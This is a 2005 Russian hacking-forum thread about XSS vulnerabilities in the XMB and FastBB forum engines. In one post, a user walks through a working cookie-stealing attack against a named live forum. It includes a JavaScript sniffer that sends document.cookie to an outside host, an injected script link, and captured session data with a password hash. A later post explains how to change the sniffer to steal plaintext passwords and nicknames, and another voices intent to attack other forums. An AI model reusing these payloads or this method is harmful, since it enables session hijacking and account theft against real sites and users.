Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
XSS в форумах XMB и FastBB |
16.11.2005, 18:03
|
|
Administrator
Регистрация: 27.05.2002
Сообщений: 1,241
Провел на форуме:
20377164
Репутация:
0
|
|
XSS в форумах XMB и FastBB
XSS в форумах XMB.
Дата добавления: 15:54 16.11.2005
Автор: XgluiR[[NO]]
Категория: Другое
Скачать: xmbxss.rar [0.99 Мб]
XSS в форумах FastBB.
Дата добавления: 15:51 16.11.2005
Автор: Ван[[NO]]
Категория: Другое
Скачать: fastbbxss.rar [0.56 Мб] |
|
|
17.11.2005, 06:13
|
|
Познавший АНТИЧАТ
Регистрация: 24.07.2005
Сообщений: 1,057
Провел на форуме:
1864132
Репутация:
116
|
|
Выдрано из архива с видео
Привет я XgLuir
Сейчас я покажу XSS в форумах XMB
идем на форум а потом в отправку личных сообщений
http://www.karakelle.ru/forum/u2u.php?action=send - тут форма для отпраки!
Дыра находиться в форме для получателей из-за плохой фильтрации
Как видите пашет внедрим снифир 
Для этого создадим js файл с кодом для сниффера
img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;
он у меня уже есть
http://www.fath.jino-net.ru/hack.js
Внедрим
REFERER=http://www.karakelle.ru/forum/u2u.php?action=send&username=<script>alert('xss')</script><script%20src=http://www.fath.jino-net.ru/hack.js></script>
QUERY=xmblva=1131740719; xmbuser=Зайка; xmbpw=202cb962ac59075b964b07152d234b70; xmblvb=1131737548
AGENT=Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)
Ну вот получили
xmbpw=202cb962ac59075b964b07152d234b70 - md5 hash
Но наверно появился вапрос а как у админы стырить ?
Отправляем админу сформированый линк он открывает и снифф записывает кукисы
http://www.karakelle.ru/forum/u2u.php?action=send&username=<script%20src=http://www.fath.jino-net.ru/hack.js></script>
Но лучше ссылку за кодировать
Вот и все |
|
|
|
17.11.2005, 11:23
|
|
Тут может быть ваша реклама.
Регистрация: 30.07.2005
Сообщений: 1,243
Провел на форуме:
4520553
Репутация:
1316
|
|
мда, извращение записывать видео, когда это мона описать в жва предложения.
Otaku спасибо.
|
|
|
|
19.11.2005, 14:46
|
|
Постоянный
Регистрация: 14.08.2005
Сообщений: 378
Провел на форуме:
670862
Репутация:
54
|
|
На fastbb багу уже прикрыли.
|
|
|
|
19.11.2005, 15:59
|
|
Постоянный
Регистрация: 20.01.2005
Сообщений: 899
Провел на форуме:
1535446
Репутация:
182
|
|
На fastbb багу уже прикрыли.
Баг сам нашел?? вроде wj че-та находил да?
|
|
|
|
19.11.2005, 16:35
|
|
[ радиоверсия ]
Регистрация: 12.07.2005
Сообщений: 946
Провел на форуме:
7544767
Репутация:
1060
|
|
Сообщение от qBiN
Баг сам нашел?? вроде wj че-та находил да?
Задолго до wj енти и другие баги нашёл Zadohlik. Просто человек скромный и не страдает манией величия. А ентот wj взял и всё обосрал - даже упаковать не смог красиво.
__________________
ICQ 9731923
|
|
|
|
19.11.2005, 20:08
|
|
Постоянный
Регистрация: 14.08.2005
Сообщений: 378
Провел на форуме:
670862
Репутация:
54
|
|
Да, я взял багу которую выложил на форум wj, но она не работала-куки не подставлялись я просто капельку додумал-присылать переменные, во всем мне многие помогали, всем респект. Видео я сначала снимать и не думал, но потом подкинули идею-решил снять.
Насчёт сейчашней ситуации на fastbb-сейчас там что-то меняют, тег img не работает вообще. Обещают(посмотрел на a.fastbb.ru) что скоро закончат.
|
|
|
|
19.11.2005, 23:33
|
|
Banned
Регистрация: 19.11.2005
Сообщений: 17
Провел на форуме:
49385
Репутация:
1
|
|
Сообщение от PSalm69
Задолго до wj енти и другие баги нашёл Zadohlik. Просто человек скромный и не страдает манией величия. А ентот wj взял и всё обосрал - даже упаковать не смог красиво.
Интересно, как понять эти и другие баги нашёл Задохлик? Что, все баги которые Я нашёл, Задохлик нашёл первый? или тебя понимать, что чтобы Я не находил, Задохлик уже это нашёл? Если да, то что? Это раз, два, Задохлик не показывает мне свою работу, по этому надежды что то скопировать у меня у него - нету как таковой.
Теперь, люди на форуме просили взломать фастбб потому что никто его не мог взломать. Если Задохлик, а кажись первым был не Задохлик а Джаз, ну так вот, если Джаз не захотел выложить коды для фастбб, или тот который нашёл, то это уже их проблемы. Я их выложил чисто чтобы похвастатся что Я Гений.
А вообще, Задохлик мало что понимает в ХSS, найти багу, с трудом может. Единственные люди на античате которые шарют в ХSS, так это White Jordan, Algol, zheleza, и zFailure которого терь нет. Задохлика эрия, это PHP including, так что не верю, что он мог в фастбб найти спаренные теги.
|
|
|
|
19.11.2005, 23:49
|
|
Banned
Регистрация: 19.11.2005
Сообщений: 17
Провел на форуме:
49385
Репутация:
1
|
|
И на ответ, что же встётки нашёл Ван.
Он нашёл, что в поле var, пассворд не шифруется, а лежит в открытом виде и дописав "+pass+nick" в место "+document.cookie" (Без кавычек) то нам придёт значение этого атрибута, то есть в нашем случаи, пассворд и ник того человека, который попадается на сниффер. Вообще-то, на сниффер может прийти практически, всё что угодно.
Даю часть кода от фастбб.
<script language='JavaScript'>
var avr = new Array ('');
var zv = new Array ('admin','администратор');
var raz = new Array ();
var users = new Array ('whitejordan','');
var chknam = new Array ('whitejordan','');
var forum='whitejordan';
var filenumber='00000001';
var prof='whitejordan';
var adresat='1132430110';
var msgid='000';
var work='1';
var pass='123';
var nick='whitejordan';
var cls='';
var reklama='';
var modraz='';
var ip='69.25.60.210';
var razdel='0';
var lasttime='1132249495';
var noprintrazdel='';
var only_new_re=0;
var start_page_re=0;
var start=0;
var guest=0;
var count=4;
var leto=0;
var group=4;
var timezone=10800;
var type=2;
var form_new_off=0;
var form_re_off=0;
var avr_off=0;
var servertime=1132430115;
var rang=4;
var re_on_page=20;
var tem_on_page=20;
var gb=0;
var graf_but_off=0;
var gde_form=1;
var pod_otvet=1;
var gr_edit=1;
var gr_bui=0;
var gr_mat=0;
var gr_sm=0;
var gr_gif=0;
var gr_avr_send=1;
var protektion=1;
</script>
Любой var может прийти на сниффер.
Последний раз редактировалось Бафун; 20.11.2005 в 11:18..
|
|
|
|
20.11.2005, 05:48
|
|
Новичок
Регистрация: 10.11.2005
Сообщений: 12
Провел на форуме:
34667
Репутация:
5
|
|
Сейчас бесполезно перемалывать старое. Уязвимость fastbb нужна так, что важней уязвимостей на форумах в этой стране просто нет. Есть 4 форума которых быть не должно. Сейчас на fastbb фильтруются все таги, расшифровывается unicode. Несмотря на идиотичнейший движок вот так, в лоб, найти XSS более невозможно. Фильтр работает на все символы, а возможностей у форума.. Новый XSS на fastbb появится только с новыми возможностями (новыми багами). Молчание знающих товарищей в ответ на запросы подтверждает эти тезисы. Вероятно имеет смысл переходить на SQL-инъекции borda.ru. За те четыре форума я готов убить borda.ru, в принципе. Но мне нужны только эти четыре..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
